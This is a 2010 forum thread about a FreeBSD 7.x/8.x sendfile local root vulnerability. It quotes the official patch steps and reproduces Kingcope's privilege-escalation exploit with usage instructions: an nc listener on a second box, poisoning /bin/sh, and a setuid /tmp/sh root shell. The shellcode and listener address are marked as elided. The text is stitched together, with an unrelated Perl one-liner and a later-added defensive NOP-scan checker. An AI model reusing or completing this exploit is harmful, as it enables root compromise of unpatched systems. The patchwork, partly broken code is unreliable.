FreeBSD 8.*, 7.* Local ‘root’ Exploit

Post by ProFTP » 2010-08-26 18:16:37

Looks like a vulnerability...

especially for those who provide ssh ... t-exploit/


Code:

1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the
RELENG_8_1, RELENG_8_0, RELENG_7_3, or RELENG_7_1 security branch dated
after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.1, 7.3,
8.0 and 8.1 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch
# fetch
b) Apply the patch.
# cd /usr/src
# patch < /path/to/patch
c) Recompile your kernel as described in
<URL:> and reboot the
3) To update your vulnerable system via a binary patch:
Systems running 7.1-RELEASE, 7.3-RELEASE, or 8.0-RELEASE on the i386 or
amd64 platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install

Code:

/*
 freebsd mbufs() sendfile cache poisoning-priv escalation
 x86/x64 local root xpl v2 by Kingcope
 tested on: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
 7.2-RELEASE-p8 (xd personally did 7.2 test)
 poisons /bin/sh to contain shellcode which does this...
 chmod a+s /tmp/sh
 chown root /tmp/sh
 execve /tmp/sh2
 how to use this is VERY important it is NOT your standard type,
 DONT start a listener as normal...let this do its shit..
 and then again, there is a MUCH simpler way you could redo
 this exploit but, thats for you to find ;) -xd
 box 1 (TARGET):
 $ cp /bin/sh /tmp/sh
 $ cp /bin/sh /tmp/sh2
 $ gcc cache.c -o cache
 box 2 (LISTENER):
 $ nc -l 7030
 on box 1 do:
 for i386 type:
 $ ./cache 1
 for amd64 type:
 $ ./cache 2
 ok now lets hope this worked and injected the shellcode,should,
 /bin/sh should be execed by the system as root in ~5 mins if lucky :)
 $ /tmp/sh
 AND cleanup:
 # cp -f /tmp/sh2 /bin/sh
 enjoy the root shell!
*/
// this juarez is now private on #darknet

/* Forum copy of the exploit: the shellcode byte strings, the listener
 * address and a few statement bodies were lost in the paste. The control
 * flow is restored below and each gap is marked; the elided specifics are
 * not filled in, so this compiles but does nothing useful as-is. */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr(); missing from the post */
#include <fcntl.h>
#include <unistd.h>      /* write(), close(); missing from the post */
#include <stdlib.h>      /* exit(); missing from the post */
#include <stdint.h>      /* int64_t */
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>

int
main(int argc, char *argv[])
{
  int s, f, k2;
  struct sockaddr_in addr;
  int flags;
  /* Shellcode that follows the NOP sled (chmod/chown /tmp/sh, then
   * execve /tmp/sh2, per the header comment). Both byte strings were
   * lost in the forum copy and are left empty here. */
  char str32[] = "";   /* i386 shellcode: elided in the post */
  char str64[] = "";   /* amd64 shellcode: elided in the post */
  char buf[10000];
  char *p;
  struct stat sb;
  int n;
  fd_set wset;
  int64_t size;
  off_t sbytes;
  off_t sent = 0;
  int chunk;
  int arch = 3;

  if (argc != 2) {
    printf("[+] Define architecture i386 or amd64 (1/2)\n");
    exit(1);
  }
  if (strcmp(argv[1], "1") == 0)
    arch = 1;
  if (strcmp(argv[1], "2") == 0)
    arch = 2;
  if (arch == 3) {
    printf("[+] Define architecture i386 or amd64 (1/2)\n");
    exit(1);
  }

  /* Connect to the listener on box 2 (nc -l 7030). The listener's IP
   * address was elided in the forum copy. */
  s = socket(AF_INET, SOCK_STREAM, 0);
  bzero(&addr, sizeof(addr));
  addr.sin_family = AF_INET;
  addr.sin_port = htons(7030);
  addr.sin_addr.s_addr = inet_addr("");
  n = connect(s, (struct sockaddr *)&addr, sizeof(addr));
  if (n < 0) {
    warn("[-] Failed to connect");
    exit(1);
  }

  /* The file whose cached pages get poisoned. */
  f = open("/bin/sh", O_RDONLY);
  if (f < 0) {
    warn("[-] Failed to open file");
    exit(1);
  }
  n = fstat(f, &sb);
  if (n < 0) {
    warn("[-] fstat failed");
    exit(1);
  }
  size = sb.st_size;
  chunk = 0;

  flags = fcntl(f, F_GETFL);
  flags |= O_NONBLOCK;
  fcntl(f, F_SETFL, flags);

  /* Push the same 2048-byte region of /bin/sh through sendfile(2) over
   * and over until st_size bytes have gone down the socket. The fixed
   * offset picks the file page the final write() is meant to land in:
   * 2048*2 = 4096 for i386, 1204*6 = 7224 (as written in the post) for
   * amd64. */
  while (size > 0) {
    FD_ZERO(&wset);   /* missing in the post; wset was never cleared */
    FD_SET(s, &wset);
    n = select(f + 1, NULL, &wset, NULL, NULL);
    if (n < 0) {
      /* body lost in the forum copy; treat as fatal */
      warn("[-] select failed");
      exit(1);
    }
    if (chunk > 0) {
      sbytes = 0;
      if (arch == 1)
        n = sendfile(f, s, 2048 * 2, chunk, NULL, &sbytes, 0);
      if (arch == 2)
        n = sendfile(f, s, 1204 * 6, chunk, NULL, &sbytes, 0);
      if (n < 0) {
        /* body lost in the forum copy; stop sending and go on to the
         * payload write */
        warn("[-] sendfile failed");
        break;
      }
      chunk -= sbytes;
      size -= sbytes;
      sent += sbytes;
    }
    chunk = 2048;
  }

  /* Build the payload: a NOP sled (256 bytes on i386, 100 on amd64)
   * followed by the shellcode. */
  memset(buf, '\0', sizeof buf);
  n = 0;
  p = buf;
  if (arch == 1) {
    for (k2 = 0; k2 < 256; k2++)
      buf[k2] = 0x90;
    p = buf + k2;
    memcpy(p, str32, sizeof str32);
    n = k2 + sizeof str32;
    p = buf;
  }
  if (arch == 2) {
    for (k2 = 0; k2 < 100; k2++)
      buf[k2] = 0x90;
    p = buf + k2;
    memcpy(p, str64, sizeof str64);
    n = k2 + sizeof str64;
    p = buf;
  }

  /* Write the payload into the socket; on a vulnerable kernel this is
   * what ends up in the cached page of /bin/sh (the "poisoning" from
   * the header comment). */
  write(s, p, n);
  close(s);
  close(f);
  return 0;
}
Perl FAQ
perl -e 'print join"",map $$_[rand@$_],([0..9,'a'..'z','A'..'Z'])x30'
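Added example, not part of the forum post or of Kingcope's exploit: two checks a sysadmin can run on a box that had untrusted local users before it was patched. The posted exploit leaves a 100-256 byte NOP sled plus shellcode inside a page of /bin/sh, so the first check scans a binary for an unusually long run of 0x90 bytes; the second compares the binary byte for byte with a known-good copy (for instance one taken from the release media) and reports the first differing offset. The 64-byte NOP threshold, the file names and the sample buffers are assumptions made for this example; the samples are constructed data, not a real /bin/sh.

```c
/* nopscan.c: added example, not from the forum post or Kingcope's exploit.
 * (1) scan a binary for a long run of 0x90 (NOP) bytes, the sled the posted
 *     exploit writes into a page of /bin/sh;
 * (2) compare it byte for byte with a known-good copy.
 * The 64-byte threshold and the sample buffers are assumptions made for this
 * example; make_sample() builds constructed data, not a real binary. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Length of the longest run of 0x90 bytes in buf; *start gets its offset. */
size_t longest_nop_run(const unsigned char *buf, size_t len, size_t *start)
{
  size_t best = 0, best_start = 0, run = 0, i;
  for (i = 0; i < len; i++) {
    run = (buf[i] == 0x90) ? run + 1 : 0;
    if (run > best) {
      best = run;
      best_start = i + 1 - run;
    }
  }
  if (start != NULL)
    *start = best_start;
  return best;
}

/* Compiler alignment padding is a handful of NOPs; a sled of `threshold`
 * bytes or more is what the exploit leaves behind. */
int looks_poisoned(const unsigned char *buf, size_t len, size_t threshold)
{
  return longest_nop_run(buf, len, NULL) >= threshold;
}

/* -1 if identical, else the offset of the first differing byte (the shorter
 * length when one buffer is a prefix of the other). */
long first_difference(const unsigned char *a, size_t alen,
    const unsigned char *b, size_t blen)
{
  size_t i, n = alen < blen ? alen : blen;
  for (i = 0; i < n; i++)
    if (a[i] != b[i])
      return (long)i;
  return alen == blen ? -1 : (long)n;
}

/* Constructed sample (assumption, not a real binary): 8192 bytes of a non-NOP
 * pattern with a 7-byte NOP pad at offset 100. The poisoned variant gets 256
 * NOPs and 8 marker bytes at offset 4096, the i386 offset (2048*2) the
 * posted exploit hands to sendfile(2). */
unsigned char *make_sample(int poisoned, size_t *len)
{
  size_t i, n = 8192;
  unsigned char *b = malloc(n);
  if (b == NULL)
    return NULL;
  for (i = 0; i < n; i++)
    b[i] = (unsigned char)(0x41 + i % 23);   /* never 0x90 */
  memset(b + 100, 0x90, 7);
  if (poisoned) {
    memset(b + 4096, 0x90, 256);
    memcpy(b + 4096 + 256, "\x31\xc0\x50\x68//sh", 8);
  }
  *len = n;
  return b;
}

/* Read a whole file into memory; NULL on error. */
unsigned char *read_file(const char *path, size_t *len)
{
  FILE *fp = fopen(path, "rb");
  unsigned char *b = NULL;
  long sz;
  if (fp != NULL && fseek(fp, 0, SEEK_END) == 0 && (sz = ftell(fp)) >= 0 &&
      fseek(fp, 0, SEEK_SET) == 0 && (b = malloc(sz + 1)) != NULL)
    *len = fread(b, 1, (size_t)sz, fp);
  if (fp != NULL)
    fclose(fp);
  return b;
}

/* Usage: ./nopscan /bin/sh /path/to/known-good/sh */
int main(int argc, char *argv[])
{
  size_t alen, blen, start, run;
  unsigned char *a = NULL, *b = NULL;
  long d;
  if (argc != 3 || (a = read_file(argv[1], &alen)) == NULL ||
      (b = read_file(argv[2], &blen)) == NULL) {
    fprintf(stderr, "usage: %s <binary> <known-good-copy>\n", argv[0]);
    return 2;
  }
  run = longest_nop_run(a, alen, &start);
  printf("longest NOP run: %zu bytes at offset %zu%s\n", run, start,
      looks_poisoned(a, alen, 64) ? "  <-- suspicious" : "");
  d = first_difference(a, alen, b, blen);
  if (d < 0)
    printf("identical to the known-good copy\n");
  else
    printf("differs from the known-good copy at offset %ld\n", d);
  free(a);
  free(b);
  return d < 0 ? 0 : 1;
}
```

The NOP-run scan is only a heuristic for this particular payload (the post itself hints at "a MUCH simpler way" that need not use a sled), so the byte-for-byte comparison against a copy you trust is the check to rely on; take that copy from the release media rather than from the same box.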



Re: FreeBSD 8.*, 7.* Local ‘root’ Exploit

Post by fox » 2010-08-28 1:48:05

Thanks, comrade! For the reminder; otherwise you can end up with an extra hole in your ass by forgetting to check the security list in time...
May the Force be with us!!!
I'll kill everyone and be the last one standing!